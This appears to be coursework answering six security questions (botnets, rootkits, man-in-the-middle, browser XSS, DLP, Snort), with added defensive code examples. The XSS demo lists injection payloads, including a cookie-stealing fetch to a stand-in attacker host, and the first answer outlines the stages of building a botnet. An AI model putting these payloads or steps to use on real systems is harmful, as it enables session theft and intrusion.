Creating a botnet





Question 1

Creating a botnet begins with assembling a collection of bots. A bot is a piece of code that is neutral in itself and can be programmed to carry out specific tasks. The bots are linked through a network and operated from a central point by a botmaster. The machines that end up in a botnet are usually unwilling participants, so a key step in forming one is the malicious takeover of those computers through concerted attacks, web-based malware, automated exploitation of vulnerable software and, at times, attacks launched from an existing botnet. A remote command-and-control center must then be set up so that the botmaster can issue orders and draw on the combined computing power of the bots. Control can be exercised through web servers, covert communication channels, IRC channels or peer-to-peer networks; a peer-to-peer design removes the single central server that defenders would otherwise try to take down. Finally, once the botnet is established, its purpose should be clearly defined, since that determines how it is used. In most cases botnets serve illegal ends, and the programming that achieves the chosen objectives is pushed out from the command center, whether for DDoS attacks, spam, keylogging, the spreading of further malware or other tasks.

Question 2

A rootkit is a malicious, stealthy type of software whose main job is to hide the existence of particular programs or processes from the user and from security tools, so that they escape detection. By evading routine scans, the hidden program or process keeps its privileged access to the machine. A rootkit can therefore conceal a wide variety of software, such as bots, file servers and remailers, letting the intruder launch attacks and exploit vulnerabilities at will. Because detection is difficult once a rootkit is in place, the best approach is prevention through a defense-in-depth strategy that combines antivirus scanners, strong password policies, firewalls and regular software updates. A number of tools can nevertheless identify rootkits, working either on behaviour or on signatures. A good example is RootkitRevealer from Sysinternals, a behaviour-based detector: it compares the file system and registry as reported through the Windows API with the same data read directly from the raw disk and registry hives and reports any discrepancy, since a rootkit that hooks the API hides objects from one view but not from the other. Once a rootkit has been found, the safest course is to wipe the machine and reinstall from known-good media, because determining exactly which files were compromised may prove very difficult.
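The cross-view technique described above, applied to the process list, as an added example (not RootkitRevealer's code, which is closed source and Windows-only): the raw view is the set of numeric entries in /proc, the API view is what ps(1) reports, and any PID present in the raw view but missing from the API view is flagged. The sample views in the main block are constructed; the live scan only runs where /proc exists.

```python
"""Cross-view process detection in the style of behaviour-based rootkit
detectors: collect the process list from two independent vantage points and
report anything visible in one view but not the other. A user-mode rootkit
that hooks the libraries ps(1) relies on hides a PID there but not in /proc,
so a disagreement between the two views deserves a closer look."""
import os
import subprocess


def pids_from_proc():
    """Raw view: numeric directory names under /proc (Linux only)."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def pids_from_ps():
    """API view: PIDs reported by ps(1), which goes through libc/procps."""
    out = subprocess.run(["ps", "-eo", "pid="], capture_output=True,
                         text=True, check=True).stdout
    return {int(tok) for tok in out.split()}


def cross_view_diff(raw_view, api_view):
    """Return (hidden, phantom): PIDs only in the raw view and only in the API view.
    A PID hidden from the API but present in the raw view is the classic rootkit
    signature; a PID only in the API view usually means the process exited between
    the two snapshots and should be re-checked rather than alerted on."""
    hidden = sorted(raw_view - api_view)
    phantom = sorted(api_view - raw_view)
    return hidden, phantom


def scan(snapshots=3):
    """Take several snapshot pairs and keep only PIDs hidden every time, which
    filters out processes that merely started or exited between views."""
    persistent = None
    for _ in range(snapshots):
        hidden, _phantom = cross_view_diff(pids_from_proc(), pids_from_ps())
        persistent = set(hidden) if persistent is None else persistent & set(hidden)
    return sorted(persistent)


if __name__ == "__main__":
    # Constructed views standing in for a hooked ps: PID 4242 is missing from the
    # API view, PID 6001 exited between the two snapshots.
    raw = {1, 2, 100, 4242, 5000}
    api = {1, 2, 100, 5000, 6001}
    print(cross_view_diff(raw, api))  # ([4242], [6001])
    if os.path.isdir("/proc"):
        print("persistently hidden PIDs on this host:", scan())
```

A kernel rootkit that unlinks a task from the kernel's own process list can hide from both views at once, which is why detectors also compare against a third source such as a memory image or a scan of PID directories by brute force; the same diff logic applies, only the views change.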

Question 3

On an unencrypted and unauthenticated network, an intruder can easily insert themselves into a private conversation and impersonate each party to the other, sending and receiving messages on behalf of both while each side believes it is talking directly to its peer. This is most likely when the intruder is positioned on the path between the parties (for instance on the same wireless network) and there is no mutual authentication, or when the intruder is able to override or abuse whatever authentication exists. Encryption alone does not stop this: a cryptographic system resists man-in-the-middle attacks only if it also authenticates the messages or the keys being exchanged, which is why every system that is secure against such attacks provides some method of authentication. Operating over an unsecured network is therefore risky. Strong mutual authentication, verification of certificates against a trusted public key infrastructure, out-of-band checking of key fingerprints, and tamper detection (for example, noticing unexpected latency in the exchange) are measures through which one can safeguard against man-in-the-middle attacks.
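The point that encryption without authentication does not stop an intruder, shown on a Diffie-Hellman key exchange, as an added example that is not part of the original answer. Alice and Bob first exchange bare public values, and Mallory, sitting on the path, replaces each with her own; both sides end up sharing a key with Mallory rather than with each other. The exchange is then repeated with each public value authenticated by an HMAC under a pre-shared key Mallory does not hold, and the substitution is rejected. The modulus is a toy Mersenne prime chosen for readability and is far too small for real use; the pre-shared key and all party names are assumptions.

```python
"""Unauthenticated versus authenticated Diffie-Hellman under an on-path attacker."""
import hashlib
import hmac
import secrets

P = 2**127 - 1      # toy modulus (Mersenne prime M127); NOT a secure group size
G = 5
AUTH_KEY = b"pre-shared-secret"   # constructed: the authenticated variant relies on this


def keypair():
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def shared_key(priv, peer_pub):
    """Session key derived from the DH shared secret."""
    return hashlib.sha256(pow(peer_pub, priv, P).to_bytes(16, "big")).digest()


def tag(pub):
    """Authenticator over a public value; Mallory cannot compute this without AUTH_KEY."""
    return hmac.new(AUTH_KEY, pub.to_bytes(16, "big"), hashlib.sha256).digest()


def verify(pub, t):
    return hmac.compare_digest(tag(pub), t)


def unauthenticated_exchange():
    """Bare public values over a channel Mallory controls."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    m_priv, m_pub = keypair()
    # Mallory swaps both public values for her own on the way through.
    k_alice = shared_key(a_priv, m_pub)           # Alice thinks m_pub is Bob's
    k_bob = shared_key(b_priv, m_pub)             # Bob thinks m_pub is Alice's
    k_mallory_alice = shared_key(m_priv, a_pub)   # Mallory's key towards Alice
    k_mallory_bob = shared_key(m_priv, b_pub)     # Mallory's key towards Bob
    return {
        "alice_bob_agree": k_alice == k_bob,
        "mallory_reads_alice": k_alice == k_mallory_alice,
        "mallory_reads_bob": k_bob == k_mallory_bob,
    }


def authenticated_exchange(attack=True):
    """Same exchange, but each public value travels with an HMAC; substituted
    values fail verification and the handshake is aborted."""
    a_priv, a_pub = keypair()
    b_priv, b_pub = keypair()
    _m_priv, m_pub = keypair()
    a_msg = (a_pub, tag(a_pub))
    b_msg = (b_pub, tag(b_pub))
    if attack:
        # Mallory can swap the value but cannot forge a tag for it.
        a_msg = (m_pub, a_msg[1])
        b_msg = (m_pub, b_msg[1])
    if not verify(*a_msg) or not verify(*b_msg):
        return {"accepted": False, "alice_bob_agree": False}
    agree = shared_key(a_priv, b_msg[0]) == shared_key(b_priv, a_msg[0])
    return {"accepted": True, "alice_bob_agree": agree}


if __name__ == "__main__":
    print("no authentication:", unauthenticated_exchange())
    print("authenticated, under attack:", authenticated_exchange(attack=True))
    print("authenticated, no attack:", authenticated_exchange(attack=False))
```

In TLS the HMAC's role is played by a signature over the handshake with a key bound to a certificate, and the "pre-shared" trust is the PKI root store; the failure mode is the same whenever a client skips certificate verification.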

Question 4

Browser security is the application of internet security to web browsers in order to protect data, computer systems and networks from malware and breaches of privacy. Much of it comes down to how the browser handles active content: JavaScript is the main vector, especially through cross-site scripting (XSS), where script injected into a page runs with that page's privileges in the victim's browser. Plugins such as Adobe Flash (now discontinued) added further attack surface, and vulnerabilities in the browsers themselves, including Mozilla Firefox, Google Chrome and Microsoft Internet Explorer, have been exploited to take over the machine. A browser can be compromised in several ways: the operating system is breached and malware reads or modifies browser memory; the operating system has malware running as a background process that interferes with the browser; the main browser executable is compromised; browser components are compromised; browser plugins are compromised; or the browser's network traffic is intercepted outside the machine. Several measures counter these. The first is monitoring plugins and extensions: although they are not part of the browser proper, they extend it and are frequently targeted, so insecure plugins should be blocked and users warned. Browser hardening is also important; it relies on sandboxing, so that page-rendering processes run with reduced privileges and a compromised page cannot reach the rest of the user's account, and on keeping the browser itself up to date.
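The XSS case from the paragraph above, seen from the server that produces the page, as an added example that is not part of the original answer: a vulnerable renderer interpolates user input straight into HTML, its hardened twin escapes it, and a small parser lists the tags and inline event handlers a browser would act on in each result. The two payloads and the page template are constructed.

```python
"""Reflected XSS: vulnerable and hardened rendering of a search query, audited
with a parser that reports the active content a browser would execute."""
from html import escape
from html.parser import HTMLParser

# Constructed attack inputs: an event-handler injection and a plain script tag.
PAYLOADS = (
    '<img src=x onerror="alert(document.cookie)">',
    "<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
)


def render_vulnerable(query):
    """Interpolates untrusted input as markup: the browser parses the payload as HTML."""
    return f"<p>Results for {query}</p>"


def render_hardened(query):
    """Escapes <, >, &, " and ' so the input can only ever be text, even inside attributes."""
    return f"<p>Results for {escape(query, quote=True)}</p>"


class ActiveContentFinder(HTMLParser):
    """Collects script-bearing tags and on* event-handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(tag)
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def active_content(fragment):
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


def audit(renderer):
    """Active content found in the renderer's output for each payload."""
    return [active_content(renderer(p)) for p in PAYLOADS]


# Defence in depth on the browser side: a CSP header that forbids inline script
# stops an injected handler from running even if escaping is missed somewhere.
CSP_HEADER = "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'"

if __name__ == "__main__":
    print("vulnerable:", audit(render_vulnerable))   # [['img@onerror'], ['script']]
    print("hardened:  ", audit(render_hardened))     # [[], []]
```

Output encoding has to match the context (HTML body, attribute, URL, or JavaScript string); `html.escape` covers the first two, which is why the hardened renderer only places the value in element text or a quoted attribute.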

Question 5

Data loss/leak prevention (DLP) software is designed to detect potential data breaches and prevent them by monitoring, detecting and blocking sensitive data while it is in use, in motion over the network, or at rest in storage. It addresses data leakage, in which sensitive data is disclosed to unauthorized persons either through malicious action or by genuine mistake. Organizations use DLP to protect company information, financial information, intellectual property and credit card data. Three categories of measure are involved: standard security measures, advanced security measures and designated DLP solutions. Standard measures are the common controls that protect data against outsider and insider attacks; the most common are firewalls, which limit outside access, together with intrusion detection and antivirus software. Advanced measures use machine learning and temporal reasoning to detect abnormal access to data (for example, an account suddenly reading far more records than usual) and to infer the intent behind unusual commands. Designated DLP solutions go further: they are built specifically to detect and prevent unauthorized attempts to copy or send sensitive data, whether intentional or accidental, including by personnel who are authorized to access it. They are more precise because they identify the data itself, through mechanisms such as exact data matching, fingerprinting (hashes of known sensitive files), regular expression matching and keywords. DLP systems are also classified by where they operate and what they protect: network DLP, endpoint DLP and file-level DLP by placement, and data identification, data leak detection and protection of data at rest, in use and in motion by function.
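Content inspection of the kind a designated DLP solution performs, as an added example that is not part of the original answer and not any vendor's code: a document is checked against a regular expression for payment card numbers (confirmed with the Luhn checksum so that random 16-digit strings do not trigger it), against a keyword list of classification labels, and against fingerprints (SHA-256 hashes) of known sensitive files. The keyword list, the fingerprinted file and the sample documents are constructed.

```python
"""Three DLP content-inspection mechanisms: regex + Luhn, keywords, fingerprints."""
import hashlib
import re

# 13 to 19 digits, optionally separated by spaces or dashes, on word boundaries.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
KEYWORDS = ("confidential", "internal only", "do not distribute")   # constructed labels


def luhn_ok(digits):
    """Luhn checksum used by payment card numbers; rejects most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_card_numbers(text):
    hits = []
    for m in CARD_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group())
        if luhn_ok(digits):
            hits.append(digits)
    return hits


def fingerprint(data):
    return hashlib.sha256(data).hexdigest()


# Constructed registry of exact-match fingerprints for files already classified as sensitive.
KNOWN_SENSITIVE = {
    fingerprint(b"Q3 board deck: acquisition of ExampleCorp\n"): "board-deck-q3",
}


def inspect(doc):
    """Inspect a document (bytes) and decide whether a DLP policy would block it."""
    text = doc.decode("utf-8", "replace")
    findings = {
        "cards": find_card_numbers(text),
        "keywords": [k for k in KEYWORDS if k in text.lower()],
        "fingerprint": KNOWN_SENSITIVE.get(fingerprint(doc)),
    }
    findings["block"] = bool(findings["cards"] or findings["keywords"] or findings["fingerprint"])
    return findings


if __name__ == "__main__":
    # Constructed samples: a real-looking card plus a Luhn-invalid lookalike,
    # a labelled memo, a fingerprinted file and a harmless message.
    for sample in (
        b"Please charge card 4111 1111 1111 1111 and 1234 5678 9012 3456, thanks",
        b"This memo is INTERNAL ONLY",
        b"Q3 board deck: acquisition of ExampleCorp\n",
        b"Lunch menu: soup of the day",
    ):
        print(sample[:30], inspect(sample))
```

Exact fingerprints only catch unmodified copies; production DLP adds partial-document matching (hashing overlapping chunks) so that a pasted paragraph from the board deck is still recognised, and the same three checks are run on network traffic and endpoints as well as on files at rest.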

Question 6

Snort is an open source network intrusion detection and prevention system (NIDS/NIPS). It was developed by Sourcefire, which Cisco acquired in 2013, and performs real-time traffic analysis and packet logging on IP networks. Many institutions use Snort for protocol analysis, content searching and content matching, and it is widely used to detect attacks and probes, including operating system fingerprinting attempts, Server Message Block (SMB) probes, buffer overflows, CGI attacks and stealth port scans; run inline, it can also drop the offending packets. Even for a small company with only 40 PCs, Snort is worth adopting: not only for its detection capabilities, but because its rule sets, maintained by the vendor's research team and by the community, are among the fastest to gain signatures for newly known attacks. So although Snort takes some extra time to install, tune and operate, it is one of the most responsive tools available for network protection.
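A local Snort rule for one of the probes named above, as an added example that is not part of the original answer or of Snort's own rule sets. It assumes Snort 2.x syntax, that `$HOME_NET` and `$EXTERNAL_NET` are defined in snort.conf as usual, and that the rule is placed in the local rules file; the SID value is a hypothetical one from the range reserved for local rules.

```snort
# Added example: alert when an external host opens an SMB session to an internal server.
# SMB1 and SMB2 headers both carry the bytes "SMB" at offset 5, after the 4-byte
# NetBIOS session header and the 0xFF / 0xFE protocol byte.
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"LOCAL SMB session from external host"; flow:to_server,established; content:"SMB"; offset:5; depth:3; classtype:attempted-recon; sid:1000001; rev:1;)

# Run in console-alert mode on the monitored interface (Snort 2.x):
#   snort -c /etc/snort/snort.conf -i eth0 -A console
```

On a 40-PC network the tuning cost is mostly in deciding what `$HOME_NET` covers and which of the vendor's rule categories to enable; a rule like the one above is only useful once the office's own external SMB traffic (if any) has been accounted for, otherwise it fires on legitimate connections.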